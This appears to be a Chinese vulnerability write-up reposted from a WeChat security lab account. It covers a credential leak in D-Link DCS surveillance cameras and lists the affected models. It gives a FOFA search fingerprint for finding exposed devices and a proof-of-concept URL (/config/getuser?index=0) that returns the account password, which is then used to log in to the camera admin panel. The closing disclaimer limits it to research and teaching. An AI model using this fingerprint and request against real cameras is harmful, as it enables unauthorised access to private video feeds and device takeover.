漏洞描述
D-Link DCS系列监控 通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面
漏洞影响
- DCS-2530L
- DCS-2670L
- DCS-4603
- DCS-4622
- DCS-4701E
- DCS-4703E
- DCS-4705E
- DCS-4802E
- DCS-P703
FOFA指纹
app="D_Link-DCS-2530L"
漏洞复现
出现漏洞的 Url 为, 其中泄露了账号密码
POC
http://xxx.xxx.xxx.xxx/config/getuser?index=0
访问http://xxx.xxx.xxx.xxx/
修改url
为http://xxx.xxx.xxx.xxx/config/getuser?index=0
爆出
账户密码
登录
本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。
原文始发于微信公众号(巢安实验室):DCS系列监控 账号密码信息泄露漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论